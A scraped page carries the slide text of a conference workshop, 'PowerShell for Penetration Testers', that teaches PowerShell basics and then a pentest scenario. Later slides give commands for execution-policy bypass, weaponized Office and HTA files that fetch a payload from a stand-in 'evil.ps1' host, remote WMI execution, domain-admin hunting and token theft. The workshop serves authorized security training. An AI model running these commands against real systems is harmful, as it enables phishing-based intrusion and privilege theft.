Better, Faster, Stronger! Boost Your Team-Based SharePoint Development Using ...
 
PowerShell from *nix user perspective
PowerShell from *nix user perspectivePowerShell from *nix user perspective
PowerShell from *nix user perspective
 
Managing Virtual Infrastructures With PowerShell
Managing Virtual Infrastructures With PowerShellManaging Virtual Infrastructures With PowerShell
Managing Virtual Infrastructures With PowerShell
 
PowerShell UIAtomation
PowerShell UIAtomationPowerShell UIAtomation
PowerShell UIAtomation
 
PowerShell 101
PowerShell 101PowerShell 101
PowerShell 101
 
Getting Started With PowerShell Scripting
Getting Started With PowerShell ScriptingGetting Started With PowerShell Scripting
Getting Started With PowerShell Scripting
 
Windows - Having Its Ass Kicked by Puppet and PowerShell Since 2012
Windows - Having Its Ass Kicked by Puppet and PowerShell Since 2012Windows - Having Its Ass Kicked by Puppet and PowerShell Since 2012
Windows - Having Its Ass Kicked by Puppet and PowerShell Since 2012
 
Introduction to PowerShell
Introduction to PowerShellIntroduction to PowerShell
Introduction to PowerShell
 
Geek Sync | Using PowerShell with Python and SQL Server
Geek Sync | Using PowerShell with Python and SQL ServerGeek Sync | Using PowerShell with Python and SQL Server
Geek Sync | Using PowerShell with Python and SQL Server
 
Gray Hat PowerShell - ShowMeCon 2015
Gray Hat PowerShell - ShowMeCon 2015Gray Hat PowerShell - ShowMeCon 2015
Gray Hat PowerShell - ShowMeCon 2015
 
Network Mapping with PowerShell
Network Mapping with PowerShellNetwork Mapping with PowerShell
Network Mapping with PowerShell
 
Practical PowerShell Programming for Professional People
Practical PowerShell Programming for Professional PeoplePractical PowerShell Programming for Professional People
Practical PowerShell Programming for Professional People
 
PowerShell 101 - What is it and Why should YOU Care!
PowerShell 101 - What is it and Why should YOU Care!PowerShell 101 - What is it and Why should YOU Care!
PowerShell 101 - What is it and Why should YOU Care!
 

Ähnlich wie Workshop: PowerShell for Penetration Testers

PHP from soup to nuts Course Deck
PHP from soup to nuts Course DeckPHP from soup to nuts Course Deck
PHP from soup to nuts Course DeckrICh morrow
 
Mastering PowerShell Testing with Pester
Mastering PowerShell Testing with PesterMastering PowerShell Testing with Pester
Mastering PowerShell Testing with PesterMark Wragg
 
Php mysql classes in navi-mumbai,php-mysql course provider-in-navi-mumbai,bes...
Php mysql classes in navi-mumbai,php-mysql course provider-in-navi-mumbai,bes...Php mysql classes in navi-mumbai,php-mysql course provider-in-navi-mumbai,bes...
Php mysql classes in navi-mumbai,php-mysql course provider-in-navi-mumbai,bes...anshkhurana01
 
Property Based Testing in PHP
Property Based Testing in PHPProperty Based Testing in PHP
Property Based Testing in PHPvinaikopp
 
Developer testing 101: Become a Testing Fanatic
Developer testing 101: Become a Testing FanaticDeveloper testing 101: Become a Testing Fanatic
Developer testing 101: Become a Testing FanaticLB Denker
 
Introduction to PowerShell
Introduction to PowerShellIntroduction to PowerShell
Introduction to PowerShellBoulos Dib
 
PowerShell Workshop Series: Session 2
PowerShell Workshop Series: Session 2PowerShell Workshop Series: Session 2
PowerShell Workshop Series: Session 2Bryan Cafferky
 
DEF CON 23 - Rich Kelley - harness powershell weaponization made easy
DEF CON 23 - Rich Kelley - harness powershell weaponization made easyDEF CON 23 - Rich Kelley - harness powershell weaponization made easy
DEF CON 23 - Rich Kelley - harness powershell weaponization made easyFelipe Prado
 
ONOS System Test - ONS2016
ONOS System Test - ONS2016ONOS System Test - ONS2016
ONOS System Test - ONS2016Suibin Zhang
 
Power shell for sp admins
Power shell for sp adminsPower shell for sp admins
Power shell for sp adminsRick Taylor
 
Nagios Conference 2014 - Mike Weber - Nagios Rapid Deployment Options
Nagios Conference 2014 - Mike Weber - Nagios Rapid Deployment OptionsNagios Conference 2014 - Mike Weber - Nagios Rapid Deployment Options
Nagios Conference 2014 - Mike Weber - Nagios Rapid Deployment OptionsNagios
 
PowerShellForDBDevelopers
PowerShellForDBDevelopersPowerShellForDBDevelopers
PowerShellForDBDevelopersBryan Cafferky
 
Flask With Server-Sent Event
Flask With Server-Sent EventFlask With Server-Sent Event
Flask With Server-Sent EventTencent
 
Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For BeginnersRamnath Shenoy
 
Test in action week 2
Test in action week 2Test in action week 2
Test in action week 2Yi-Huan Chan
 

Ähnlich wie Workshop: PowerShell for Penetration Testers (20)

PHP from soup to nuts Course Deck
PHP from soup to nuts Course DeckPHP from soup to nuts Course Deck
PHP from soup to nuts Course Deck
 
Bsides tampa
Bsides tampaBsides tampa
Bsides tampa
 
Mastering PowerShell Testing with Pester
Mastering PowerShell Testing with PesterMastering PowerShell Testing with Pester
Mastering PowerShell Testing with Pester
 
Php mysql classes in navi-mumbai,php-mysql course provider-in-navi-mumbai,bes...
Php mysql classes in navi-mumbai,php-mysql course provider-in-navi-mumbai,bes...Php mysql classes in navi-mumbai,php-mysql course provider-in-navi-mumbai,bes...
Php mysql classes in navi-mumbai,php-mysql course provider-in-navi-mumbai,bes...
 
From P0W3R to SH3LL
From P0W3R to SH3LLFrom P0W3R to SH3LL
From P0W3R to SH3LL
 
Property Based Testing in PHP
Property Based Testing in PHPProperty Based Testing in PHP
Property Based Testing in PHP
 
Developer testing 101: Become a Testing Fanatic
Developer testing 101: Become a Testing FanaticDeveloper testing 101: Become a Testing Fanatic
Developer testing 101: Become a Testing Fanatic
 
Introduction to PowerShell
Introduction to PowerShellIntroduction to PowerShell
Introduction to PowerShell
 
PowerShell-1
PowerShell-1PowerShell-1
PowerShell-1
 
PowerShell Workshop Series: Session 2
PowerShell Workshop Series: Session 2PowerShell Workshop Series: Session 2
PowerShell Workshop Series: Session 2
 
DEF CON 23 - Rich Kelley - harness powershell weaponization made easy
DEF CON 23 - Rich Kelley - harness powershell weaponization made easyDEF CON 23 - Rich Kelley - harness powershell weaponization made easy
DEF CON 23 - Rich Kelley - harness powershell weaponization made easy
 
Ansible
AnsibleAnsible
Ansible
 
ONOS System Test - ONS2016
ONOS System Test - ONS2016ONOS System Test - ONS2016
ONOS System Test - ONS2016
 
Power shell for sp admins
Power shell for sp adminsPower shell for sp admins
Power shell for sp admins
 
Nagios Conference 2014 - Mike Weber - Nagios Rapid Deployment Options
Nagios Conference 2014 - Mike Weber - Nagios Rapid Deployment OptionsNagios Conference 2014 - Mike Weber - Nagios Rapid Deployment Options
Nagios Conference 2014 - Mike Weber - Nagios Rapid Deployment Options
 
PowerShellForDBDevelopers
PowerShellForDBDevelopersPowerShellForDBDevelopers
PowerShellForDBDevelopers
 
Flask With Server-Sent Event
Flask With Server-Sent EventFlask With Server-Sent Event
Flask With Server-Sent Event
 
Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For Beginners
 
coLearning PHP
coLearning PHPcoLearning PHP
coLearning PHP
 
Test in action week 2
Test in action week 2Test in action week 2
Test in action week 2
 

Kürzlich hochgeladen

GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessPixlogix Infotech
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 

Kürzlich hochgeladen (20)

GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 

Workshop: PowerShell for Penetration Testers

  • 2. Get-Host • Hacker, Trainer, Speaker, Penetration Tester • Creator of Kautilya and Nishang. • Twitter: @nikhil_mitt • Blog – http://labofapenetrationtester.com • Interested in Offensive Information Security, new attack vectors and methodologies to pwn systems. • Previous talks: Defcon, Blackhat, Troopers, DeepSec, EuSecwest, Hackfest, PHDays etc. 2PowerShell for Penetration Testers HITB
  • 3. $PFPTLab = Get-Content • What is PowerShell • Why PowerShell • Executing commands, scripts and modules • Extended PowerShell usage • A Penetration Testing Scenario • Defenses 3PowerShell for Penetration Testers HITB
  • 4. $PFPTLab | Format-Custom • This is a hands-on workshop, keep your Windows machines/VMs ready. • We will stick to PowerShell v2, unless specified otherwise. • For language basics, we will go with bare minimum to be able to cover interesting stuff in couple of hours. • The workshop assumes zero knowledge of PowerShell so if you know something: do {Start-Sleep –s 60} while {$SomethingNew –ne $true} 4PowerShell for Penetration Testers HITB
  • 5. $PFPTLab | where-object {$_ -eq “What is PowerShell"} • “Windows PowerShell® is a task-based command- line shell and scripting language designed especially for system administration. Built on the .NET Framework, Windows PowerShell helps IT professionals and power users control and automate the administration of the Windows operating system and applications that run on Windows.” http://technet.microsoft.com/en- us/library/bb978526.aspx 5PowerShell for Penetration Testers HITB
  • 6. $PFPTLab | where-object {$_ -eq “Why PowerShell"} • Present by default on modern Windows OS. • Tightly integrated with Windows and allows interaction with .Net, Filesystem, Registry, API, Certificates, COM, native commands, network, domain etc. • Expandable with use of .Net framework. • Easy to learn. • Less dependency on *nix based tools. • Trusted by System Admins, Blue Teams and (mostly) AV etc. 6PowerShell for Penetration Testers HITB
  • 7. Why PowerShell? PowerShell for Penetration Testers HITB 7 http://www.quickmeme.com/ONE-OF-US
  • 8. about_PowerShell.exe • powershell.exe is the console part of PowerShell. • Execute native commands, cmdlets, functions and scripts. • Supports tab completion, command aliases, Operators etc. • Provides various options and execution parameters. 8PowerShell for Penetration Testers HITB
  • 9. Invoke-HandsOn • Try running powershell.exe and Write-Output “Hello World” • Try usual bash and cmd commands. 9PowerShell for Penetration Testers HITB
  • 10. $PFPTLab | where-object {$_ -eq “powershell.exe"} • powershell.exe is the console part of PowerShell. • Execute native commands, cmdlets, functions and scripts. • Supports tab completion, command aliases, Operators etc. • Provides various options and execution parameters. 10PowerShell for Penetration Testers HITB
  • 11. Get-Help Get-Help • Easy to use and very useful. • This is the first place to go for learning something new or looking for solution to a problem. • Detailed help for cmdlets, conceptual topics, scripts, functions and modules. • Supports wildcards. • You may need to run Update-Help (v3 onwards). 11PowerShell for Penetration Testers HITB
  • 12. Get-Help Get-Help • Use with about_* to list help about a conceptual topic. • Various parameters could be passed to Get-Help Get-Help Get-Help –Full Get-Help Get-Command -Examples 12PowerShell for Penetration Testers HITB
  • 13. $Exercise[0] 1. Use PowerShell help system to list everything available. 2. List help about “process”. 3. List help about powershell.exe conceptual topic. 13PowerShell for Penetration Testers HITB
  • 14. $PFPTLab | where-object {$_ -eq “cmdlets"} • A Cmdlet is pronounced as “command let”. • Cmdlets are task based compiled .Net classes. • Certainly one of the best features of PowerShell. • They follow a Verb-Noun naming convention. • Cmdlets have aliases. • Like every other command in PowerShell, cmdlets return objects. 14PowerShell for Penetration Testers HITB
  • 15. $PFPTLab | where-object {$_ -eq “cmdlets"} • Explore cmdlets Get-Command –CommandType Cmdlet • Explore cmdlets based on a verb Get-Command –Verb Get • Get-Command also supports wildcards. 15PowerShell for Penetration Testers HITB
  • 16. Invoke-HandsOn • I need a count shout for number of Cmdlets you have on your machine. Get-Command –CommandType Cmdlet | Measure-Object • As you can see, PowerShell supports the pipe (|) operator as well. 16PowerShell for Penetration Testers HITB
  • 17. $Exercise[1] 1. I need names of three cmdlets each from everyone which can be useful in Penetration Tests. 17PowerShell for Penetration Testers HITB
  • 18. about_Windows_PowerShell_ISE • A GUI Scripting environment. • Tab completion, context-sensitive help, syntax highlighting, selective execution, in-line help are some of the useful features. • PowerShell scripts have .ps1 extension. 18PowerShell for Penetration Testers HITB
  • 19. Invoke-HandsOn 1. Write a script which prints Hello World. 2. Save it and execute it. 19PowerShell for Penetration Testers HITB
  • 21. about_Execution_Policies • Execution Policy is present to stop a user from accidently running scripts. • There are numerous ways to bypass it: powershell.exe –ExecutionPolicy bypass .script.ps1 powershell.exe –EncodedCommand <> powershell.exe –c <> Read: 15 ways to bypass PowerShell execution policy https://www.netspi.com/blog/entryid/238/15-ways-to- bypass-the-powershell-execution-policy 21PowerShell for Penetration Testers HITB
  • 22. $PFPTLab | where-object {$_ -eq “Variables"} • Variables are declared in the form $varname. • Variables can hold outputs from Cmdlets, native commands, functions etc. as each one returns an object or array of objects. Examples: $DirList = Get-Childitem $UserList = & "net" "user" 22PowerShell for Penetration Testers HITB
  • 23. $PFPTLab | where-object {$_ -eq “Types"} • PowerShell is not strictly typed. • You need not specify the Type of a variable. • If required, Type conversion could be done with the cast [] operator. 23PowerShell for Penetration Testers HITB
  • 24. $PFPTLab | where-object {$_ -eq “Statements"} • Conditional Statements – If, else, elseif, Switch • Loop Statements – while() {}, do {} while(), do {} until(), for(;;){}, foreach ( in ){} – ForEach-Object 24PowerShell for Penetration Testers HITB
  • 25. $PFPTLab | where-object {$_ -eq “Functions"} • Basic Declaration function <function_name> ( param1, param2) { do stuff } • Calling a function <function_name> <value1> <value2> • param statement provides advanced attributes for function parameters. 25PowerShell for Penetration Testers HITB
  • 27. $PFPTLab | where-object {$_ -eq “Basics of Modules"} • A simplest module is a PowerShell script with the extension .psm1 • Use Get-Module -ListAvailable to list modules. • Use Import-Module <modulepath>to import a module. • Use Get-Command –Module <Modulename> to list functions exported by a module. 27PowerShell for Penetration Testers HITB
  • 28. $Exercise[2] 1. Convert the script Check-RegistryKey.ps1 to a script module. 2. Try importing the module and use its functions. 28PowerShell for Penetration Testers HITB
  • 29. $PFPTLab | where-object {$_ -eq “.Net with PowerShell"} • Most powerful feature of PowerShell. Great to extend the existing capabilities of PowerShell. • Useful for loading .Net assemblies, using Windows API, using .Net code and classes in a PowerShell script. 29PowerShell for Penetration Testers HITB
  • 30. $PFPTLab | where-object {$_ -eq “.Net with PowerShell"} Exploring .Net classes $ProcClass = [AppDomain]::CurrentDomain.GetA ssemblies() | ForEach-Object {$_.GetTypes()}| where {$_.IsPublic -eq "True“} | where {$_.Name -eq “Process”} 30PowerShell for Penetration Testers HITB
  • 31. $PFPTLab | where-object {$_ -eq “.Net with PowerShell"} Using .Net Classes • Static Methods $ProcClass | Get-Member –Static $ProcClass:: GetProcesses() 31PowerShell for Penetration Testers HITB
  • 32. $PFPTLab | where-object {$_ -eq “.Net with PowerShell"} Using .Net Classes • Creating instance $WebClient = New-Object System.Net.WebClient $WebClient | Get-Member –MemberType Method $WebClient | Get-Member -Name DownloadString | Format-List * $WebClient.DownloadString("http://google.com") 32PowerShell for Penetration Testers HITB
  • 33. $PFPTLab | where-object {$_ -eq “.Net with PowerShell"} • Use Add-Type to add .Net code/classes and Windows API to a PowerShell script or session. • See New-DotnetCode.ps1 for example of using .Net code. 33PowerShell for Penetration Testers HITB
  • 34. $PFPTLab | where-object {$_ -eq WMI"} • WMI is a treasure trove for hackers. • PowerShell could be used to retrieve information from WMI as well execute commands and scripts. • Explore the cmdlets related to WMI Get-Command -CommandType Cmdlet – Name *wmi* 34PowerShell for Penetration Testers HITB
  • 35. $PFPTLab | where-object {$_ -eq WMI"} • To run a PowerShll command using WMI use: Invoke-WmiMethod -Class win32_process -Name create - ArgumentList "powershell -c Get-Process" –ComputerName <> 35PowerShell for Penetration Testers HITB
  • 36. $PFPTLab | where-object {$_ -eq COM"} • PowerShell can use COM Objects as well. • Limitless opportunities for automation! $ie = New-Object -ComObject internetexplorer.application $ie | Get-Member 36PowerShell for Penetration Testers HITB
  • 37. $PFPTLab | where-object {$_ -eq PenTest Scenario"} • Lets consider a Pen Test scenario: – The Goal of Penetration Test is to get access to get Domain Administrator access (not a very good goal but lets target it for this lab . – Server side attacks have been largely unsuccessful. – Msf payloads are being detected by Anti Virus and other countermeasures. 37PowerShell for Penetration Testers HITB
  • 38. $Exploitation = $PFPTLab | where- object {$_ -eq Exploitation"} • PowerShell is very useful in getting a foothold system in a target network. • The trust on PowerShell by system administrators and countermeasures like AV makes it an ideal tool for Exploitation. 38PowerShell for Penetration Testers HITB
  • 39. $Exploitation | where-object {$_ -eq Client Side Attacks"} • PowerShell is an ideal tool for client side attacks on a Windows platform. • It could be used for generating weaponized files for email phishing campaigns and drive by download attacks. • Lets use Client Side attack scripts from Nishang (https://github.com/samratashok/nishang) 39PowerShell for Penetration Testers HITB
  • 40. $Exploitation | where-object {$_ -eq Client Side Attacks"} • Generating weaponized MS Office Files Out-Word -Payload "powershell.exe - ExecutionPolicy Bypass -noprofile - noexit -c Get-Process“ Out-Word -PayloadURL http://yourwebserver.com/evil.ps1 Out-Excel -Payload "powershell.exe –EncodedCommand <>“ 40PowerShell for Penetration Testers HITB
  • 41. $Exploitation | where-object {$_ -eq Client Side Attacks"} • Drive by download attacks Out-HTA -PayloadURL http://192.168.254.1/powerpreter.ps m1 -Arguments Check-VM • More weaponized files Out-CHM Out-Shortcut 41PowerShell for Penetration Testers HITB
  • 42. $Exploitation | where-object {$_ -eq Shells"} • Now that we can run successful client side attacks, we may need shell level access for further attacks. • PowerShell can be used to write shells as well. • Shells in PowerShell can be used with exploits to get access to the target machine. 42PowerShell for Penetration Testers HITB
  • 43. $Exploitation | where-object {$_ -eq Shells"} • Interactive PowerShell Shells from Nishang • Metasploit’s msfvenom - Meterpreter using PowerShell 43PowerShell for Penetration Testers HITB
  • 44. $PostExp = $PFPTLab | where-object {$_ -eq Post Exploitation"} • PowerShell is arguably one of the best tools around for Windows Post Exploitation. • We have an interactive PowerShell session on one of the machines on the target and various PowerShell tools can be used now. 44PowerShell for Penetration Testers HITB
  • 45. $PostExp | where-object {$_ -eq Domain Enumeration"} • We can use Powerview (https://github.com/Veil- Framework/PowerTools/tree/master/Power View) to enumerate the target domain. • The goal is to find a machine where a Domain Admin is logged in. 45PowerShell for Penetration Testers HITB
  • 46. $PostExp | where-object {$_ -eq Domain Enumeration"} • To find machines which have a domain admin logged in and the current user has access to that machine: Invoke-UserHunter –CheckAccess –Domain <targetdomain> 46PowerShell for Penetration Testers HITB
  • 47. $PostExp | where-object {$_ -eq Priv Escalation"} • Now we can use the Domain Admin token on the target machine using Invoke- TokenManipulation and some PowerShell hackery: Get-Process -id <DA process> | Invoke-TokenManipulation CreateProcess cmd.exe Invoke-TokenManipulation is a part of Powersploit (https://github.com/mattifestation/PowerSploit) 47PowerShell for Penetration Testers HITB
  • 48.
  • 49. $PFPTLab | where-object {$_ -eq Defenses"} • Log Log Log! • Monitor and Analyze the logs. • Understand flow/use of privileges and credentials in your environment. • If a determined attacker can break into any system, a determined system administrator can catch any attacker as well. 49PowerShell for Penetration Testers HITB
  • 50. $PFPTLab | where-object {$_ -eq Credits"} Credits/FF to PowerShell hackers (in no particular order) @obscuresec, @mattifestation, @JosephBialek, @Carlos_Perez, @Lee_Holmes, @ScriptingGuys, @BrucePayette, @dave_rel1k, @enigma0x3, @subTee, @harmj0y and other PowerShell bloggers and book writers. 50PowerShell for Penetration Testers HITB
  • 51. $PFPTLab | where-object {$_ -eq Closing Remarks"} • Bad guys are already using PowerShell, using it for security testing is imperative now. Both for red teams and blue teams. • PowerShell is the not the future of Windows Penetration Testing, it is the present. 51PowerShell for Penetration Testers HITB
  • 52. $PFPTLab | where-object {$_ -eq Self Promotion"} • Check out PowerShell for Penetration Testers two days trainings at: http://www.labofapenetrationtester.com/p/tr ainings.html#pfptschedule 52PowerShell for Penetration Testers HITB
  • 53. $PFPTLab | where-object {$_ -eq Feedback"} • Please fill the feedback form. • I am looking for contributors. • Nishang is available at https://github.com/samratashok/nishang • Follow me @nikhil_mitt • nikhil.uitrgpv@gmail.com • http://labofapenetrationtester.com/ 53PowerShell for Penetration Testers HITB

Hinweis der Redaktion

  1. http://blogs.technet.com/b/heyscriptingguy/archive/2010/11/11/use-powershell-to-work-with-the-net-framework-classes.aspx http://powershell.com/cs/blogs/ebookv2/archive/2012/03/27/chapter-20-loading-net-libraries-and-compiling-code.aspx
  2. http://www.darkoperator.com/blog/2013/2/6/introduction-to-wmi-basics-with-powershell-part-2-exploring.html
  3. http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html
  4. www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
  5. http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/
  6. Incognito: .\incognito.exe -h newpc -u domainuser -p <> execute -c BHARAT\Administrator cmd.exe